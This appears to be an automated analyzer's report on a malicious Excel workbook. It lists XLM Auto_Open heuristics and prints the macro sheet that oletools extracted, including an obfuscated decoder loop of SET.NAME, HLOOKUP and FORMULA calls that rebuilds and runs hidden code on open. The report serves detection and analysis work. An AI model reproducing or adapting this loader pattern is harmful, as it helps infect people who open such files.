MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6507 bytes |
SHA-256: 14f4a74b950c2a0947a66e42709d43234487288fdbdef0bbf96cd4786fcf2807 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 16 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - CMLrcoT
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!E163
' 0018 25 LABEL : Cell Value, String Constant - bCRfiiXXfy len=0
' 0018 26 LABEL : Cell Value, String Constant - CgxODsPsFFo len=0
' 0018 24 LABEL : Cell Value, String Constant - cHRHWaxBV len=0
' 0018 23 LABEL : Cell Value, String Constant - EOzAinen len=0
' 0018 22 LABEL : Cell Value, String Constant - eTnMgjt len=0
' 0018 20 LABEL : Cell Value, String Constant - Iqtzl len=0
' 0018 27 LABEL : Cell Value, String Constant - JFvKtSDFwJvF len=0
' 0018 24 LABEL : Cell Value, String Constant - KTBHfORde len=0
' 0018 25 LABEL : Cell Value, String Constant - PuLmJZwrlx len=0
' 0018 22 LABEL : Cell Value, String Constant - PXLeFEG len=0
' 0018 27 LABEL : Cell Value, String Constant - QzZFgxTylfBT len=0
' 0018 23 LABEL : Cell Value, String Constant - rdUrMXuh len=0
' 0018 22 LABEL : Cell Value, String Constant - REnOUqe len=0
' 0018 22 LABEL : Cell Value, String Constant - SlqEkLe len=0
' 0018 21 LABEL : Cell Value, String Constant - SsnjCf len=0
' 0018 21 LABEL : Cell Value, String Constant - tJyfOE len=0
' 0018 25 LABEL : Cell Value, String Constant - trlBjCrzxm len=0
' 0018 27 LABEL : Cell Value, String Constant - VpVgcdCoutnZ len=0
' 0018 26 LABEL : Cell Value, String Constant - xdaDWzPLFwn len=0
' 0018 27 LABEL : Cell Value, String Constant - YwdpiFgWrmVr len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' CMLrcoT,E68,"SET.NAME("Iqtzl",VALUE("0"))",""
' CMLrcoT,E73,"SET.NAME("SsnjCf",Iqtzl)",""
' CMLrcoT,E75,"SET.NAME("SlqEkLe",Iqtzl)",""
' CMLrcoT,E78,"SET.NAME("KTBHfORde",COUNTA(cHRHWaxBV))",""
' CMLrcoT,E82,"SET.NAME("VpVgcdCoutnZ",COUNTA(tJyfOE))",""
' CMLrcoT,E87,[],""
' CMLrcoT,E90,"SET.NAME("eTnMgjt","")",""
' CMLrcoT,E93,"SsnjCf",""
' CMLrcoT,E97,"SET.NAME("YwdpiFgWrmVr",HLOOKUP("*",cHRHWaxBV,SsnjCf,FALSE))",""
' CMLrcoT,E99,"CgxODsPsFFo",""
' CMLrcoT,E101,"SET.NAME("PXLeFEG",Iqtzl)",""
' CMLrcoT,E106,[],""
' CMLrcoT,E108,"PXLeFEG",""
' CMLrcoT,E111,"REnOUqe",""
' CMLrcoT,E113,"PuLmJZwrlx",""
' CMLrcoT,E118,"bCRfiiXXfy",""
' CMLrcoT,E123,"SET.NAME("trlBjCrzxm",VALUE(HLOOKUP("*",tJyfOE,bCRfiiXXfy,FALSE)))",""
' CMLrcoT,E128,"JFvKtSDFwJvF",""
' CMLrcoT,E132,"eTnMgjt",""
' CMLrcoT,E136,"SlqEkLe",""
' CMLrcoT,E141,NEXT(),""
' CMLrcoT,E146,"QzZFgxTylfBT",""
' CMLrcoT,E150,"SET.NAME("f",INT(T(FORMULA(T(eTnMgjt)&"",""&T(QzZFgxTylfBT)))))",""
' CMLrcoT,E152,"xdaDWzPLFwn",""
' CMLrcoT,E156,NEXT(),""
' CMLrcoT,E161,RETURN(),""
' CMLrcoT,E185,"SET.NAME("rdUrMXuh",E68)",""
' CMLrcoT,E189,"cHRHWaxBV",""
' CMLrcoT,E191,"SET.NAME("tJyfOE",R79C12)",""
' CMLrcoT,E193,"SET.NAME("xdaDWzPLFwn",201)",""
' CMLrcoT,E195,"SET.NAME("EOzAinen",5)",""
' CMLrcoT,E200,rdUrMXuh(),""
' CMLrcoT,E201,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.